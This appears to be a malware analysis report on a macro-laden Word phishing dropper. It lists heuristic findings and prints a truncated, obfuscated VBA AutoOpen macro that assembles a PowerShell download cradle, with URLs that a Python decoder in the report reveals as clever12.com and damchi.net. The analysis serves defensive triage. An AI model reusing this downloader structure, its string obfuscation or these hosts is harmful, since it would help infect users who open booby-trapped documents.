Verdict: MALICIOUS
Risk score: 242

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The critical OLE_VBA_SHELL finding and the high OLE_VBA_PCODE_AUTOEXEC_EXEC finding together indicate that the VBA project in this Office document runs automatically and is built to execute an external command. The recovered source shows Sub AutoOpen() handing the output of a string-building function (omwjibm) to Application.Run on a dynamically named routine; the Shell() call that OLE_VBA_SHELL reports lies in the part of the module the preview does not show. The strings are assembled from Mid() slices of longer literals, and the slices carry recognisable pieces of a PowerShell download cradle ("-object", "System.N") and of URLs ("http", "://", ".com/", ".net") interleaved with junk tokens such as 3hB+3hB and x9H+x9H. That is the signature of a macro downloader that fetches and runs a second-stage payload when the document is opened. The ClamAV signature Img.Dropper.PhishingLure-6443153-0 independently classifies the file as a dropper delivered as a phishing lure.
Heuristics (7)

- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. The call is not within the truncated preview shown below; look for it in the full macros.bas artifact.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro. Confirmed by the recovered source: Sub AutoOpen() calls Application.Run on a routine with a random-looking name and passes it the result of the string-building function omwjibm.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample it corroborates the source-level findings rather than standing in for them, because olevba did recover the source.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the generic rule text does not fit this sample exactly: a VBA project was recovered (macros.bas), so for this report the marker is redundant with OLE_VBA_AUTOOPEN.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace URI that any Office document with drawing content carries; it is not an indicator. The attacker-controlled URLs in this sample live inside the macro's Mid() string fragments and only appear after deobfuscation, which is why they are not listed here.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24918 bytes | a20f8e103a6f18bf1ba7f40825f5511328ddd25a3d8cd2ca8c1d148917a3600b |
Preview script (first 1,000 lines of the extracted script; the report cuts the listing off mid-statement). macros.bas concatenates two modules: the empty ThisDocument class module (the eight Attribute lines) and a standard module named NPbCwrUmVbRtzi that holds AutoOpen. The lines of arithmetic on never-assigned variables are padding; On Error Resume Next ensures they cannot abort the macro.

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NPbCwrUmVbRtzi"
Sub AutoOpen()
On Error Resume Next
JZkdFcJzN = NjRTcwuSVUzsv - XFBiJfWDVpSY / (4510086 + JTWvTFjZvX - 7706686 + IDHkPQd)
wFAabphRK = bBDZUIBwB - qCwJduFXSv / (7027427 + BuZTItuFlnZ - 2116249 + WkdnuFlNrn)
vHrwjkKzO = BAJAAzIDvnD - npHJcjXqwMJ / (1344515 + MRwOVboKhSW - 5228340 + nvziSDkRUBp)
Application.Run "ikRoLmOMGMZZwc", omwjibm
XHabYfoqC = niLpZMPTFW - iwvcsQuFWMsP / (1397124 + NAMmCifYHzMls - 8542746 + UwOfEoJizfOul)
fJvSEwLMC = DsFJqwPHYBOB - ikDCEVNGn / (6919715 + twEuhtjfSRKnwi - 3695023 + jYqsXduRiBwH)
End Sub
Function omwjibm()
On Error Resume Next
kwTVGBDr = ihEvWcXb - zmwdcAsKpFizDz / (8027511 + YUbSjTY - 3806082 + dnhokihndro)
YwCLjI = wWTJJqBTNfk - szIvJPiNi / (9536317 + NLVFWwLZGAYazI - 1682040 + dXASzDSvma)
fwrAPwajIRB = iNMbzAXGwoki - BGdNUWKnAq / (159953 + ifBJsZTwKhLtZ - 4901745 + aCKkstdQrZ)
SiHdVNwSC = oacbzTBUjGz + Mid(("LzaojdGuzqpQscvCHRQd.c3hB+3hBox9H+x9HtpDfstzYlG"), 21, 17)
hWAhtpvs = UVVwFORiLTuk - uzjlqFHzBOKko / (9580977 + fMEnhoE - 842897 + FEVbKRw)
aCoziqaFjLV = pQjSjNnSEoTGKL - ROCzPGCAp / (8593560 + fljjmjSNvYQ - 6968212 + wQUdzlwuunENIS)
ZVTFZsDpcQ = qmPqaCiCjXCk - zQtAdDAzlZAEu / (6791359 + wiTdRlXJIZKw - 3119025 + lFzAJzitE)
cfthauLZm = bPQwdXM + Mid(("o ran3hB+3hBdom;c3hB+3hBZVYYU = .(WaHn3hB+3hBeWaDFX+DFXH+WaH3hB+3hBwWa3hB+'+'3hBH+3hB+3hBWaDFX+DFXH-ob'+'je3hB+3hBc3hBDFX+DFX+3hBt'+'WaH) Sy3x9H+x9H'+'hB+3hBsx9H+x9Htem3x9H+'+'x9HhB+3hB.NxbFnhcVKFwfdZt"), 2, 187)
BYkwRiP = YTCZGla - GklAUCDklG / (918778 + jYzDTwsnid - 3550082 + fAZhHXXI)
nrEFaOlj = PzhwDsNiuhr - fUATwGJsmpcRaV / (3698837 + VdOjwvUYSHP - 924985 + FjwbLzjZOIR)
PiFrLdUiOd = PrZXPViYk - RTHCkAbB / (8372583 + FMhFfqPVmDHVz - 4288806 + EuBDlhfvsSdU)
dNpnohXULD = FRhEMPmfTzDF + Mid(("VZQUWGwDKfjHsSDC 3hB+3hB= 3hB+DWiXZZFLWta"), 14, 17)
KfZYh = UrYGNlhF - WlVfFZzFIZRonC / (4331525 + FGEuEWOi - 8926446 + KifUtOnWHin)
vWzETcrQT = aZPKRikVhoCz - icKrzXql / (5998803 + TaofDBQvn - 3692610 + jfitEftZtW)
ckWdMBwnW = fMOlcfHLzwv - wkdDhTQt / (2779597 + mwwjzurwMls - 8202821 + bQRYkobWWlUiJb)
WUoUq = PjwNQaIC + Mid(("AuoCEvozGXjHQJqV3hB+3hB/3hB+3hlzQv"), 17, 14)
AYjwB = TAmJSFpB - PvjEmKPNcznTQ / (6940108 + JOcvBzcb - 320406 + HVkcBcUZowK)
kullSmDuQ = YbpKDMwvsDQfAE - tznnTidiofk / (5066438 + StcnwNqBGr - 9276024 + dGiEFEczz)
KwcnzGjSZVc = aAJqRuwAfSm - czbdjmNbnIr / (4447242 + YuaiaIcVrTbdG - 9270552 + EFLddzdjdcVpkX)
HQzCO = MFcdOzaQowi + Mid(("nhRwMrzMrphEXmmliwZYAaUB(3hB+3hBDFX+DFX10000Owlm"), 24, 21)
hKmSKMLO = zzdqRXhwNtq - LzGETszEBSqGDv / (6638718 + GUTrsDdcswSAG - 4050706 + sIzoYLAqRJjijI)
AJhCjnjPrzZ = mWotptazCI - dMUZzwjXz / (9505173 + HJcGdBh - 2259895 + zTVMwLMfBS)
HnwkNiQMN = vjFhnVsM - zJLZjPfRjPYR / (8187457 + VJrIdmlBVinK - 5125882 + vTIJVcb)
MFzsTmZO = RJmzsAWRFJJHk + Mid(("DB+3hB)3hBDFX+DFX+3hB, cZ3hB+3hBVSDC)wtMiJzRvEbAvdBuZTsfuESvKCtzEMI"), 2, 36)
iiFtira = vMOazvnjlW - aVQHOwNHhAvdw / (1085693 + FjkvFdUYXvvvf - 6143900 + cJJsFZf)
kLGESjvzJCs = fwrqCWzjSUG - DvqQLFztLTAib / (6224425 + mUDzQaEEzO - 7406338 + BXLcaYpzh)
DzPnbntRn = shAcmSMvIP - wNPOUqPwqq / (239777 + mwVAqaJljq - 3537708 + WzoomsEFXzC)
OuDMHCIHE = IvfhjvvlusEzj + Mid(("OuGjUMdB+3hBp:3hB+3h'+'B//clex9H+x9Hver12.com/E3hB+3hBcIF/?3hBx9DFX+DFX'+'H+xD'+'FX+DF'+'X9H+3hBh3hB+3hBttp3hB+3x9H+x9HhB:3hB+3hB//3hB+3hBdamchi.3hBDFX+DFX+3hBnet3hB+3hBtRKODrusSusSuBAChEQRbbz"), 8, 162)
MnVPMj = INjQSVUzimHvo - VBbMwmvBptLEc / (3980221 + KkApjOlIXTW - 6813823 + sKuOHWk)
mNSpci = wlsqwGXmEOtA - TBHFEdjtDs / (5374024 + pJfwzwG - 7018215 + LzIwnHNVSFdjj)
ErBGAfb = InICsAovsQ - HzsoHRnPjHCzH / (3439221 + VXlnwTIjWL - 7854240 + NjFQGsLfKVhLnp)
aBmMYpoj = vOFiawqd + Mid(("AthmkhB+3hBn(3hB+3'+'hBcZ3hB+3hBVa3hB+3x9H+x9HhBsf3hB+3hBc3hB+3hB'+'.3hB+3hBCv3hB'+'+'+'3hBnT3hB+3DFX+'+'DFXhBoSt3hB+3hBrSdx9H+x9H3hB+3hB83hB+3
```
... (truncated)
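The Mid() slices above can be decoded without running the macro. The script below is an added worked example for this report, not analyzer output and not code from the sample: it applies VBA Mid() semantics (1-based start, fixed length) to three string literals copied verbatim from the preview, then strips the junk that is spliced into the results. Two things are assumptions inferred from the fragments rather than anything the report states: that "3hB+3hB", "x9H+x9H", "DFX+DFX" and the PowerShell concatenation noise "'+'" are deletable filler, and that "WaH" stands in for a single quote. Because the preview is truncated, the order in which the macro concatenates its variables is unknown, so each fragment is decoded on its own.

```python
"""Decode the Mid()-fragment strings from the macros.bas preview.

Added example for this report. Token list and the WaH -> ' mapping are
inferred from the visible fragments, not documented by the analyzer.
"""
import re

# Three Mid() statements copied verbatim from the macro preview.
SAMPLE_VBA = """
SiHdVNwSC = oacbzTBUjGz + Mid(("LzaojdGuzqpQscvCHRQd.c3hB+3hBox9H+x9HtpDfstzYlG"), 21, 17)
cfthauLZm = bPQwdXM + Mid(("o ran3hB+3hBdom;c3hB+3hBZVYYU = .(WaHn3hB+3hBeWaDFX+DFXH+WaH3hB+3hBwWa3hB+'+'3hBH+3hB+3hBWaDFX+DFXH-ob'+'je3hB+3hBc3hBDFX+DFX+3hBt'+'WaH) Sy3x9H+x9H'+'hB+3hBsx9H+x9Htem3x9H+'+'x9HhB+3hB.NxbFnhcVKFwfdZt"), 2, 187)
OuDMHCIHE = IvfhjvvlusEzj + Mid(("OuGjUMdB+3hBp:3hB+3h'+'B//clex9H+x9Hver12.com/E3hB+3hBcIF/?3hBx9DFX+DFX'+'H+xD'+'FX+DF'+'X9H+3hBh3hB+3hBttp3hB+3x9H+x9HhB:3hB+3hB//3hB+3hBdamchi.3hBDFX+DFX+3hBnet3hB+3hBtRKODrusSusSuBAChEQRbbz"), 8, 162)
"""

# Matches a complete Mid(("literal"), start, length) call; a call cut off by
# the preview truncation has no closing parenthesis and is deliberately skipped.
MID_CALL = re.compile(r'Mid\(\("([^"]*)"\),\s*(\d+),\s*(\d+)\)')

# Assumed filler tokens. "'+'" comes first because it is spliced into the
# middle of the other tokens (e.g. "3hB+'+'3hB").
JUNK_TOKENS = ("'+'", "3hB+3hB", "x9H+x9H", "DFX+DFX")
QUOTE_TOKEN = "WaH"  # assumed stand-in for a single quote

HOST = re.compile(r"://([A-Za-z0-9.-]+)")


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(s, start, length): 1-based start, at most `length` characters."""
    if start < 1 or length < 0:
        raise ValueError("VBA Mid() requires start >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def extract_fragments(vba_source: str) -> list[str]:
    """Evaluate every complete Mid() call, in order of appearance."""
    return [vba_mid(lit, int(start), int(length))
            for lit, start, length in MID_CALL.findall(vba_source)]


def strip_junk(fragment: str) -> str:
    """Delete filler tokens until a fixpoint: removing one token can join the
    halves of another (e.g. "Sy3" + "x9H+x9H" + "hB+3hBs" -> "Sys")."""
    text = fragment
    while True:
        before = text
        for tok in JUNK_TOKENS:
            text = text.replace(tok, "")
        if text == before:
            return text


def deobfuscate(fragment: str) -> str:
    """Strip filler, restore quotes, then fold PowerShell 'a'+'b' literals."""
    text = strip_junk(fragment).replace(QUOTE_TOKEN, "'")
    return text.replace("'+'", "")


def hosts(text: str) -> list[str]:
    """Host names that follow a '://' in decoded text, in order of appearance."""
    return HOST.findall(text)


if __name__ == "__main__":
    for raw in extract_fragments(SAMPLE_VBA):
        clean = deobfuscate(raw)
        print(repr(clean), hosts(clean))
```

Run on the three literals, the first slice decodes to ".co", the second to a fragment containing ".('new-object') System.N", and the third to "B+3hBp://clever12.com/EcIF/?http://damchi.net". The leftover "B+3hBp:" at the head of the third fragment is half of a filler token whose other half sits at the tail of a neighbouring fragment, which is the reason the assembly order matters and why the full macros.bas artifact, not the preview, is the right input for a complete reconstruction. Treat the two host names as indicators to verify, not as confirmed live infrastructure; nothing in this report establishes whether they resolved or served anything.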